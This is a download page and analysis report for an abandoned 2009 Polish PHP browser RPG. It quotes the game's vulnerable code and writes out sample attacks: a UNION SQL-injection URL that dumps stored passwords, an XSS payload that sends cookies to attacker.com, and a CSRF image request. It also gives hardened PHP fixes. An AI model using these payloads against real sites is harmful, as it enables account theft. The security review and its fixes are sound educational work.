
Comand RPG

Technical Details

Filename: comand_rpg.zip
Size: 170.66 KB
Downloads: 112
Author: Unknown
Created: 2008-12-31
Changed: 2025-12-16
System: PHP 5.x
Price: $0.00

Muster your squad and march into a World War II browser RPG built for quick, tactical showdowns. ComandRPG blends turn-based duels with gritty gear management—knife to Garand to Thompson—while you train attack, defense, and speed, manage fatigue, and climb the ranks across a war-torn campaign.

Between missions, stock up at the shop, trade letters through the field mail, and swap stories in chat. With streamlined systems, clear progression, and a focus on punchy battles, ComandRPG delivers a lean wartime experience where timing, loadout, and nerve decide the outcome.

File Verification
MD5 Checksum
547fb19790e6d1acf9d56aadb1add18f
SHA1 Checksum
c8979e8ac9b2a2de5567664d9e925d680ccfdeb1

Game Analysis Report

1. Game Metadata

Game Name: ComandRPG (also stylized as "Comand RPG")

Genre: WWII Military Combat RPG

Theme: World War II soldier simulator with equipment management and turn-based combat

License: GNU General Public License v2 (GPL v2) - Polish translation included

Version: 0.1 (early alpha/pre-release stage)

Copyright: © 2009 ComandRPG

Authors: Khulmar (primary), boosik01 (contributor)

Language: Polish (UTF-8 Polish collation for database, ISO-8859-1 for HTML)

Technology: PHP 5.x, MySQL 5.x (MyISAM engine), HTML 4.01 Transitional, inline CSS

Release Date: 2009 (based on copyright headers)

Distribution Status: Open-source project, incomplete development (version 0.1 indicates early abandonment)

2. File Composition

| File Type | Count | Size (MB) | Purpose |
| --- | --- | --- | --- |
| Total | 59 files | 0.76 MB | Complete game package |
| *.php | 26 | 0.092 | Game logic, pages, combat system |
| *.jpg | 12 | 0.250 | Background images, graphics |
| *.htm | 8 | 0.001 | Empty security index files |
| *.gif | 7 | 0.003 | UI elements, icons |
| *.png | 3 | 0.004 | Interface graphics |
| *.sql | 1 | 0.005 | Database schema (mysql.sql) |
| *.txt | 1 | 0.021 | GPL v2 license (Polish translation) |
| *.css | 1 | 0.004 | Stylesheet (css/style.css) |

Analysis: Extremely lightweight game (under 1 MB total), indicating minimal content and early-stage development. The 26 PHP files suggest basic functionality only. Multiple empty index.htm files (8 total) show directory access protection attempts. GPL v2 license in Polish (341 lines) demonstrates commitment to open-source but suggests limited international distribution plans.

3. Technical Architecture

Database Schema (8 tables):

  • chat - Chat system
      • Fields: id, autor (author), text
      • Character set: utf8_polish_ci
      • AUTO_INCREMENT value of 44 (evidence of 43+ chat messages in development/testing)
  • ekwipunek (Equipment/Inventory)
      • Fields: id, owner (user_id), atak (attack), stan (status 0/1 for equipped), nazwa (item name)
      • Decimal attack values (12,1 precision)
      • Empty table (no default items)
  • enemy - Enemy NPC definitions
      • Fields: id, name, atak, weapons, szybkosc (speed), obrona (defense), kasa (money), hp
      • Default enemies included:
          • "Dezerter" (Deserter): 10 attack, 5 weapons, 10 speed, 10 defense, 100 money, 150 HP
          • "Zbuntowany porucznik" (Rebellious Lieutenant): 15 attack, 15 weapons, 15 speed, 15 defense, 500 money, 200 HP
      • Only 2 enemies in entire game (minimal content)
  • konta (Accounts/Characters) - Primary player data table
      • Authentication: login, haslo (password - plaintext), email, ip
      • Stats: atak, obrona, szybkosc, exp, max_exp, lvl, suma (total stat points)
      • Resources: kasa (money), zycie/maxzycie (HP), zmeczenie/max_zmeczenie (fatigue 0-50)
      • Profile: wiek (age), hobby, opis (description), gender, pochodzenie (origin - default "Miasto"/City)
      • System: online (timestamp), chat (Y/N flag), rank (default 'User'), tuti (tutorial 0/1 flag), gg (Gadu-Gadu IM number - Polish IM service)
      • Default starting stats: 23 attack, 10 defense, 6 speed, 1500 money, 100 HP, 50 max fatigue, 0 XP/50 max XP
      • Empty table (no default accounts)
  • mail - Private messaging system
      • Fields: id, owner, text, title, autor, autor_id, date, if_read (Y/N), type, do_user
      • Supports inbox/outbox with read/unread status
      • Empty table
  • newsy (News) - Announcements system
      • Fields: id, text
      • Empty table (no default news entries)
  • sklep (Shop) - Item store
      • Fields: id, nazwa (name), atak (attack bonus), cena (price)
      • Default weapons (WWII theme confirmed):
          • "Nóż" (Knife): 5 attack, 250 money
          • "M1 Garand rifle": 25 attack, 1250 money
          • "Thompson M1A1 SMG": 50 attack, 2500 money
          • "Browning automatic rifle": 75 attack, 3750 money
          • "Springfield M1903": 100 attack, 5000 money
      • 5 total weapons (minimal progression)

PHP Architecture:

  • Session-based authentication: $_SESSION['login'] and $_SESSION['pass'] (plaintext password storage)
  • Common files: config.php (database), session.php (auth), user.php (User class), verify_mail.php (email validation), reset.php
  • Page structure: head.php/bottom.php includes, head_index.php for public pages
  • User class: OOP approach with getBasic($pid) method loading player data into $user->get array
  • Direct SQL queries: No abstraction layer, uses deprecated mysql_* functions

Combat System Architecture:

  • Turn-based combat with maximum 20 rounds
  • Speed-based turn order: Higher speed attacks first each round
  • Attack formula: (attack + weapon_bonus) - defense / rand(1,3)
  • Defense evasion: If defender's defense >= attacker's damage, attack is dodged
  • Victory conditions:
      • Win: Enemy HP reaches 0 → gain enemy's money
      • Loss: Player HP reaches 0 → lose enemy's money (or entire bank if insufficient)
      • Draw: 20 rounds expire → "Walka nierozstrzygnięta" (Fight inconclusive)
  • Fatigue system: Each fight increases zmeczenie by 1, +1-3 XP gained
  • Maximum fatigue: Cannot fight when zmeczenie == max_zmeczenie (50)

4. Gameplay Mechanics

Core Game Loop:

  • Character Creation:
      • Username (minimum 5 characters)
      • Password (minimum 6 characters - plaintext storage)
      • Email (validated via verify_mail.php)
      • Gender selection: "Mężczyzna" (Male) or "Kobieta" (Female)
      • Origin selection: "Górskie lasy" (Mountain forests), "Pustynia" (Desert), or "Miasto" (City)
      • Initial tutorial flag (tuti = 0) → redirects to tuti.php (tutorial page)
      • Starting stats vary by origin (implemented via switch statement in reg.php)
  • Main Gameplay:
      • Documents page (main.php): View character stats (nick, origin, email, attack, defense, speed)
      • Shop (shop.php): Purchase WWII weapons (5 items total) using money
      • Equipment (equip.php): Manage inventory, equip weapons (only 1 weapon can have stan=1)
      • Fight (fight.php): Select enemy from dropdown, engage in turn-based combat
      • Training (trening.php): Presumably stat improvement (file exists but not analyzed)
      • Hospital (hospital.php): Likely HP restoration (file exists but not analyzed)
      • Chat (chat.php): Community chat with 44-message history from testing
      • Mail (mail.php): Private messaging system
      • Rankings (ranking.php): Leaderboard system
      • View (view.php): View other players' profiles
      • Panel (panel.php): Account settings
  • Weather System (Advertised but Not Implemented):
      • Marketing claim: "W walkach pogoda ma znaczenie, dlatego też gdy pada deszcz to twój żołnierz słabnie, zaś gdy jest ładna pogoda twój żołnierz walczy z maksymalną siłą." ("Weather matters in battles - when it rains your soldier weakens, but in good weather your soldier fights at maximum strength.")
      • Reality: No weather variables in database schema, no weather logic in fight.php
      • Conclusion: Feature promised but never implemented (version 0.1 alpha state)
  • Progression Systems:
      • Experience: Gain 1-3 XP per fight (random), level up when exp >= max_exp
      • Money: Earn from victories, spend in shop, lose on defeats
      • Equipment: 5-weapon progression (knife → rifle → SMG → BAR → sniper)
      • Fatigue: Regeneration system not visible in code (likely time-based or hospital visit)
      • Stats: Attack, defense, speed (presumably improvable via trening.php)

5. Database Activity Evidence

Signs of Development/Testing Activity:

  • Chat table: AUTO_INCREMENT=44 indicates 43 chat messages were sent during development/testing
  • All other tables: Empty or contain only default seed data (2 enemies, 5 shop items)
  • No production data: Game was never released to public or had extremely limited testing phase

Player Activity Assessment: MINIMAL TO NONE - The game appears to have been tested only by developers (chat activity), with no evidence of public release or player base.

6. Code Quality Assessment

Rating: 3/10 (Below Average - Early Alpha Quality)

Strengths:

  • GPL v2 licensing: Proper open-source distribution with Polish translation of license
  • Code documentation: Every PHP file has GPL header block with authors, version, copyright
  • OOP attempt: User class shows understanding of object-oriented design patterns
  • Input validation: Some validation exists (username length, email format checking, array whitelisting for gender/origin)
  • Combat system: Functioning turn-based combat with speed-based turn order and multiple outcomes

Critical Weaknesses:

  • Plaintext password storage: haslo field stores passwords in plaintext (security disaster)

        mysql_query("SELECT `login`, `haslo` FROM `konta` WHERE `login`='".htmlspecialchars($_POST['login'])."' AND `haslo`='".htmlspecialchars($_POST['haslo'])."'");

  • SQL injection vulnerabilities:
      • Extensive use of string concatenation in queries

            mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']);
            mysql_query('SELECT * FROM `sklep` WHERE `id`='.$_GET['kup']);

      • GET parameters directly inserted without parameterization
      • Only htmlspecialchars() used (does NOT prevent SQL injection)
  • Deprecated mysql_* functions: All database code uses mysql_query(), mysql_fetch_array(), mysql_num_rows() (removed in PHP 7.0+)
  • XSS vulnerabilities: User input echoed directly to pages

        echo '<p>'.$i->text.'</p>'; // News content
        echo '<p>'.$item['nazwa'].'</p>'; // Item names

  • Session security flaws:
      • Password stored in session: $_SESSION['pass'] (plaintext password in memory)
      • No CSRF protection on any forms
      • No session regeneration after login
  • Logic errors:
      • Deprecated ereg() function used (removed PHP 7.0): ereg("^[0-9]*$", $_GET['enemy'])
      • get_magic_quotes_gpc() check for non-existent var_dumpa() function
      • Weather system advertised but not implemented
  • Character encoding mess: Mixed latin2, latin1, utf8_polish_ci in database; ISO-8859-1 in HTML
  • Incomplete implementation: Version 0.1 with promised features (weather) not coded

Code Maturity: This is alpha-stage code with fundamental security flaws and incomplete features. The developers understood basic concepts (OOP, validation) but lacked security knowledge and abandoned the project before beta quality.

7. Modern-Day Assessment & Conclusions

Innovation Rating: 4/10 (Low-Moderate)

Novel Elements:

  • Fatigue mechanic: Innovative stamina system limiting consecutive battles (zmeczenie counter)
  • Speed-based turn order: Not just highest speed goes first - speed determines who attacks each individual round
  • WWII theme for Polish audience: Niche combination (WWII + browser RPG + Polish language)
  • Origin system: Character creation choices affect starting stats (3 origins with different bonuses)
  • Equipment status flags: stan field (0/1) allows inventory collection with single active weapon

Derivative Elements:

  • Turn-based combat: Standard RPG formula
  • Shop → Fight → Level → Shop loop: Universal browser RPG progression
  • Attack/Defense/Speed stat trinity: Common RPG mechanic
  • Chat/mail/rankings/profiles: Standard social features

Overall Innovation: Lower-middle tier. The fatigue mechanic and speed-based turn resolution show creative thinking, but the game is fundamentally a standard stat-based browser RPG with a WWII skin. The promised weather system (if implemented) would have been innovative, but it remains vaporware.

Security Assessment: CATASTROPHIC

This game has every major vulnerability from the 2009 era:

  • Plaintext password storage (no hashing whatsoever)
  • SQL injection (GET parameters directly in queries)
  • XSS attacks (user content echoed without sanitization)
  • CSRF (no tokens on any forms)
  • Session fixation (no session regeneration)
  • Password in session (plaintext password kept in $_SESSION['pass'])

Danger Level: EXTREME - Any deployment would be compromised within hours. Database would be dumped, all accounts stolen, site defaced.

Modern Viability: 1/5 (Essentially Zero)

Why This Game Cannot Be Used Today:

  • Non-functional on modern PHP: Uses mysql_* functions (removed PHP 7.0, 2015)
  • Security nightmare: Plaintext passwords, SQL injection, XSS everywhere
  • Incomplete: Version 0.1 with advertised features (weather) not implemented
  • Minimal content: 2 enemies, 5 weapons, no quests, no story
  • Polish-only: Limited market appeal outside Poland
  • Deprecated functions: ereg() removed PHP 7.0, get_magic_quotes_gpc() removed PHP 7.4

Modernization Cost Estimate:

| Task | Hours | Cost @ $75/hr |
| --- | --- | --- |
| Database migration (mysqli/PDO) | 8 | $600 |
| Password hashing (bcrypt/Argon2) | 4 | $300 |
| SQL injection fixes (prepared statements) | 12 | $900 |
| XSS/CSRF protection | 8 | $600 |
| Session security overhaul | 4 | $300 |
| Content creation (enemies, weapons, story) | 40 | $3,000 |
| Weather system implementation | 16 | $1,200 |
| Testing & debugging | 16 | $1,200 |
| TOTAL | 108 hours | $8,100 |

However: Even with $8,100 investment, the resulting game would be a basic browser RPG with 2009-era gameplay and minimal content. The Polish-only language would limit market to ~38 million people. Return on investment: Negative.

Better Alternative: Build modern game from scratch using Laravel/React for $10,000-$15,000 with 2024 standards.

Historical Value:

This game is a time capsule of Polish indie game development in 2009:

  • Language barrier: Polish-only content shows domestic market focus pre-globalization
  • Gadu-Gadu integration: gg field in user table references Polish IM service (dominant 2000s Poland, now obsolete)
  • GPL adoption: Shows Polish developer awareness of open-source licensing
  • WWII theme: Polish historical interest (WWII deeply significant in Polish culture)
  • Alpha abandonment: Typical of solo/duo indie projects with no funding (Khulmar + boosik01)

The game never progressed beyond alpha testing (43 chat messages, 0 players) and represents the high abandonment rate of amateur browser RPG projects in the late 2000s. The promise-versus-delivery gap (weather system advertised but not coded) shows classic feature creep and scope mismanagement.

8. Security Analysis

Critical Vulnerabilities (2009 OWASP Top 10 violations):

  • A1: Injection - SQL injection everywhere

        // Vulnerable to SQL injection
        $enemy = mysql_fetch_object(mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']));
        // Attack: fight.php?enemy=1 OR 1=1

  • A2: Broken Authentication
      • Plaintext password storage

            -- Plaintext password storage (schema excerpt)
            CREATE TABLE `konta` (`haslo` varchar(100) NOT NULL default '');

            // Password in session
            $_SESSION['pass'] = htmlspecialchars($_POST['haslo']);
            // No password hashing, no encryption

  • A3: Sensitive Data Exposure
      • Passwords stored in plaintext in database
      • Passwords stored in plaintext in sessions
      • Email addresses exposed via profiles
      • IP addresses logged without consent notice
  • A7: XSS (Cross-Site Scripting)

        // User content echoed without encoding
        echo '<p>'.$i->text.'</p>'; // News entries
        echo '<p>'.$item['nazwa'].'</p>'; // Item names from database
        // Attack: News entry with <script>alert(document.cookie)</script>

  • A8: CSRF (Cross-Site Request Forgery)
      • No CSRF tokens on any forms
      • Shop purchases via GET: shop.php?kup=1
      • Combat via GET: fight.php?enemy=1
      • Account changes unprotected

Additional Vulnerabilities:

  • Deprecated functions:
      • mysql_* removed PHP 7.0 (non-functional since 2015)
      • ereg() removed PHP 7.0
      • get_magic_quotes_gpc() removed PHP 7.4
  • Character encoding issues:
      • Mixed encodings (UTF-8, latin1, latin2, ISO-8859-1)
      • Polish characters may break in some contexts
  • No prepared statements: Every query vulnerable to injection
  • No input filtering: Only htmlspecialchars() used (insufficient)
  • Session management flaws:
      • No session_regenerate_id() after login
      • No session timeout
      • No "remember me" secure implementation
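
A hardened form of the login path criticised under A2 and the session management flaws above, as an added example that is not ComandRPG code: the login name is a bound parameter, haslo holds a password_hash() value, and the session keeps only the account id. It assumes haslo is widened to VARCHAR(255) and that reg.php stored each password exactly as typed; the function names are illustrative, and an in-memory SQLite database with one constructed account stands in for MySQL so the block runs offline.

```php
<?php
declare(strict_types=1);

// Added example, not ComandRPG code. Assumes `haslo` is widened to
// VARCHAR(255) and that reg.php stored each password exactly as typed.

/** One-off migration: replace every plaintext `haslo` with a hash. */
function migratePlaintext(PDO $db): int
{
    $rows = $db->query('SELECT id, haslo FROM konta')->fetchAll(PDO::FETCH_ASSOC);
    $upd  = $db->prepare('UPDATE konta SET haslo = :h WHERE id = :id');
    $done = 0;
    foreach ($rows as $r) {
        // Skip rows that already hold a password_hash() value.
        if (password_get_info($r['haslo'])['algoName'] !== 'unknown') {
            continue;
        }
        $upd->execute([':h' => password_hash($r['haslo'], PASSWORD_DEFAULT), ':id' => $r['id']]);
        $done++;
    }
    return $done;
}

/** Returns the account id on success, null on any failure. */
function login(PDO $db, string $login, string $password): ?int
{
    static $dummy = null;
    $dummy ??= password_hash('unused', PASSWORD_DEFAULT);

    // Bound parameter: the login name never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, haslo FROM konta WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Unknown users are verified against a dummy hash so both paths do the same work.
    $hash = $row === false ? $dummy : $row['haslo'];
    if (!password_verify($password, $hash) || $row === false) {
        return null;
    }
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $db->prepare('UPDATE konta SET haslo = :h WHERE id = :id')
           ->execute([':h' => password_hash($password, PASSWORD_DEFAULT), ':id' => $row['id']]);
    }
    return (int) $row['id'];
}

/** Call from the web login page, after session_start() and a successful login(). */
function startAuthenticatedSession(int $accountId): void
{
    session_regenerate_id(true);        // issue a fresh id and drop the pre-login one
    $_SESSION = ['uid' => $accountId];  // account id only, never the password
}

// Demo on constructed data; in-memory SQLite stands in for the MySQL database.
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE konta (id INTEGER PRIMARY KEY, login TEXT, haslo TEXT)');
    $db->exec("INSERT INTO konta (login, haslo) VALUES ('szeregowy', 'haslo123')");

    var_dump(migratePlaintext($db));
    var_dump(login($db, 'szeregowy', 'haslo123'));
    var_dump(login($db, 'szeregowy', 'wrong'));
    var_dump(login($db, "szeregowy' OR '1'='1", 'haslo123'));
}
```

Run the migration once during the upgrade, then remove every read and write of $_SESSION['pass'] from session.php and the pages that include it.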

Exploitation Scenarios:

SQL Injection → Database Dump:

GET /fight.php?enemy=1 UNION SELECT login,haslo,email,1,1,1,1 FROM konta--
Result: Dump all usernames, plaintext passwords, emails

XSS → Cookie Theft:

POST news entry: <script>fetch('http://attacker.com?c='+document.cookie)</script>
Result: Admin session stolen, site compromised

CSRF → Unauthorized Purchases:

<img src="http://victim.com/shop.php?kup=5"> embedded in external site
Result: Victim unknowingly purchases expensive weapon

Password Exposure:

  • Single database breach exposes ALL passwords in plaintext
  • No recovery from this - users can't change passwords if attacker has them

9. Recommendations

For Historical/Academic Use Only:

  • DO NOT DEPLOY: This game is critically insecure and non-functional on modern PHP
  • Educational value: Study as example of 2009-era security mistakes
  • Archival: Preserve as artifact of Polish indie game development
  • GPL compliance: Respect GPL v2 license if redistributing/studying

If Attempting Modernization (Not Recommended):

  • Security overhaul (MANDATORY):
      • Migrate to PDO/mysqli with prepared statements
      • Implement bcrypt/Argon2id password hashing
      • Add CSRF tokens to all forms
      • Implement XSS protection (htmlspecialchars with ENT_QUOTES on all output)
      • Remove password from session storage
      • Add session regeneration after login
  • Technical debt:
      • Replace deprecated mysql_* functions (8 hours)
      • Remove ereg() (use preg_match())
      • Fix character encoding to UTF-8 throughout
      • Implement weather system (16 hours) to deliver on marketing promises
  • Content expansion:
      • Add 20-30 more enemies (minimum)
      • Create 50+ weapons for progression
      • Implement quest system
      • Write storyline/lore
      • Add training system
      • Develop hospital recovery mechanics
  • Internationalization:
      • English translation (minimum for market viability)
      • Multi-language support framework
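
How the prepared-statement, CSRF-token, output-encoding and ereg() items of the security overhaul fit together for the shop purchase, as an added example that is not ComandRPG code. The function names, the POST field names and the uid session key are assumptions; table and column names follow the schema described in section 3, and an in-memory SQLite database with constructed rows stands in for MySQL.

```php
<?php
declare(strict_types=1);

// Added example, not ComandRPG code: POST handler replacing shop.php?kup=N.

function csrfToken(array &$session): string
{
    // One random token per session, emitted as a hidden field in each form.
    return $session['csrf'] ??= bin2hex(random_bytes(32));
}

function e(string $s): string
{
    // Encode on output so stored names and news text cannot inject markup.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function buyItem(PDO $db, array &$session, string $method, array $post): string
{
    if (!isset($session['uid'])) {
        return 'Not logged in.';
    }
    $sent = $post['csrf'] ?? '';
    if ($method !== 'POST' || !is_string($sent)
        || !hash_equals(csrfToken($session), $sent)) {
        return 'Rejected: POST with a valid CSRF token required.';
    }
    // Replaces ereg("^[0-9]*$", ...): only a positive integer passes.
    $id = filter_var($post['kup'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 'Rejected: invalid item id.';
    }
    $q = $db->prepare('SELECT nazwa, atak, cena FROM sklep WHERE id = ?');
    $q->execute([$id]);
    $item = $q->fetch(PDO::FETCH_ASSOC);
    if ($item === false) {
        return 'No such item.';
    }
    // Balance check and debit are one statement; the transaction needs InnoDB, not MyISAM.
    $db->beginTransaction();
    $pay = $db->prepare('UPDATE konta SET kasa = kasa - ? WHERE id = ? AND kasa >= ?');
    $pay->execute([$item['cena'], $session['uid'], $item['cena']]);
    if ($pay->rowCount() !== 1) {
        $db->rollBack();
        return 'Not enough money.';
    }
    $db->prepare('INSERT INTO ekwipunek (owner, atak, stan, nazwa) VALUES (?, ?, 0, ?)')
       ->execute([$session['uid'], $item['atak'], $item['nazwa']]);
    $db->commit();
    return 'Bought: ' . e($item['nazwa']);
}

// Demo on constructed data; in-memory SQLite stands in for MySQL.
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE sklep (id INTEGER PRIMARY KEY, nazwa TEXT, atak REAL, cena INTEGER)');
    $db->exec('CREATE TABLE konta (id INTEGER PRIMARY KEY, kasa INTEGER)');
    $db->exec('CREATE TABLE ekwipunek (id INTEGER PRIMARY KEY, owner INTEGER, atak REAL, stan INTEGER, nazwa TEXT)');
    $db->exec("INSERT INTO sklep (nazwa, atak, cena) VALUES ('<b>Nóż</b>', 5, 250)");
    $db->exec('INSERT INTO konta (id, kasa) VALUES (1, 1500)');
    $session = ['uid' => 1];
    $token   = csrfToken($session);
    echo buyItem($db, $session, 'GET',  ['kup' => '1']), "\n";
    echo buyItem($db, $session, 'POST', ['kup' => '1']), "\n";
    echo buyItem($db, $session, 'POST', ['kup' => '1 OR 1=1', 'csrf' => $token]), "\n";
    echo buyItem($db, $session, 'POST', ['kup' => '1', 'csrf' => $token]), "\n";
}
```

On a web page, pass $_SESSION, $_SERVER['REQUEST_METHOD'] and $_POST as the arguments; the same pattern applies to fight.php, which also changes state through a GET link.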

Realistic Assessment: Modernization would cost $8,100+ and result in mediocre 2009-era browser RPG. Better to build new game from scratch using modern frameworks (Laravel + React/Vue) for similar investment with 2024 standards and scalability.

Preservation Value: Archive as example of:

  • Polish indie game development (2009)
  • GPL adoption in Polish development community
  • WWII themes in Polish gaming culture
  • Early alpha abandonment patterns
  • Security practices of 2009 era (what NOT to do)
  • Gadu-Gadu integration (Polish IM service nostalgia)

10. Final Verdict

Game Type: Early-alpha WWII soldier browser RPG with turn-based combat and fatigue mechanics

Development Status: Abandoned at version 0.1 (2009)

Completion Level: ~25% (core combat works, but minimal content, missing promised features)

Code Quality: 3/10 (functional core, catastrophic security, deprecated APIs)

Innovation: 4/10 (fatigue mechanic and speed-based turns show creativity)

Security: CATASTROPHIC (plaintext passwords, SQL injection, XSS, no CSRF protection)

Modern Viability: 1/5 (non-functional on PHP 7+, requires $8,100+ modernization for minimal return)

Historical Significance: Low-moderate (documents Polish indie game development, GPL adoption, Gadu-Gadu era)

Best Use Case Today: Educational study of 2009-era security vulnerabilities and abandoned indie project patterns. Should NOT be deployed under any circumstances.

Unique Characteristics:

  • Fatigue-based combat limiting (innovative for 2009)
  • WWII theme targeting Polish market
  • Weather system promised but not implemented (classic feature creep)
  • Gadu-Gadu IM integration (Polish cultural artifact)
  • GPL v2 with Polish translation (shows licensing awareness)

Bottom Line: ComandRPG represents an ambitious but prematurely abandoned solo/duo project from 2009 Poland. The developers (Khulmar + boosik01) had some good ideas (fatigue system, speed-based combat) but lacked security expertise and likely ran out of motivation during alpha development. The game's 43 chat messages and 0 players tell the story of a project that never escaped internal testing. Modern deployment is impossible due to PHP 7+ incompatibility and catastrophic security flaws. Estimated modernization cost ($8,100) exceeds value of resulting product. Preserve as historical artifact only.

DO NOT DEPLOY THIS CODE - CATASTROPHIC SECURITY

ComandRPG stores passwords in plaintext, has SQL injection in every query, uses deprecated mysql_* functions (removed PHP 7.0), and lacks all modern security practices. The 43 chat messages and 0 players show it never left internal testing. This is a 2009 Polish alpha project (v0.1) abandoned before beta quality.

Final Recommendations

For Developers
  • DO study fatigue mechanic (innovative for 2009)
  • DO examine speed-based turn order
  • DO NOT deploy - PHP 7+ incompatible
  • DO NOT learn from security practices (all wrong)
  • DO use as teaching example of what NOT to do
For Game Designers
  • Fatigue system limiting consecutive battles interesting
  • WWII theme + browser RPG unique combo
  • Speed determines individual turn order clever
  • Origin system affects starting stats
  • Weather system vaporware (never implemented)
For Server Administrators
  • NEVER deploy - instant compromise guaranteed
  • Plaintext passwords = catastrophic breach
  • SQL injection in every query
  • mysql_* removed PHP 7.0 (2015)
  • No XSS protection, no CSRF tokens
For Historians
  • Documents 2009 Polish indie game development
  • Gadu-Gadu IM integration (Polish cultural artifact)
  • GPL v2 with Polish translation (licensing awareness)
  • WWII theme reflects Polish historical interest
  • Alpha abandonment pattern typical of era

Rating Summary

| Category | Rating | Score | Notes |
| --- | --- | --- | --- |
| Historical Value | ★★★☆☆ | 3/5 | Polish indie game artifact (2009) |
| Code Quality | ★★★☆☆ | 3/10 | Functional core, catastrophic security |
| Innovation | ★★★★☆ | 4/10 | Fatigue + speed mechanics creative |
| Security | ☆☆☆☆☆ | 0/5 | Plaintext passwords, SQL injection everywhere |
| Completeness | ★★☆☆☆ | 25% | Version 0.1 alpha, missing features |
| Modern Viability | ★☆☆☆☆ | 1/5 | PHP 7+ incompatible, minimal ROI |
| Cultural Significance | ★★★☆☆ | 3/5 | Gadu-Gadu era, WWII theme |
| Overall Grade | | D- | Abandoned alpha with good ideas, catastrophic security |

Security Warning

Running many of the scripts in this archive on a live server presents a serious security risk. These projects were created before modern hardening practices and may contain vulnerabilities that can compromise your system.

We strongly recommend using this code for reference and analysis only, or in isolated local environments. By downloading these files, you accept full responsibility for their use.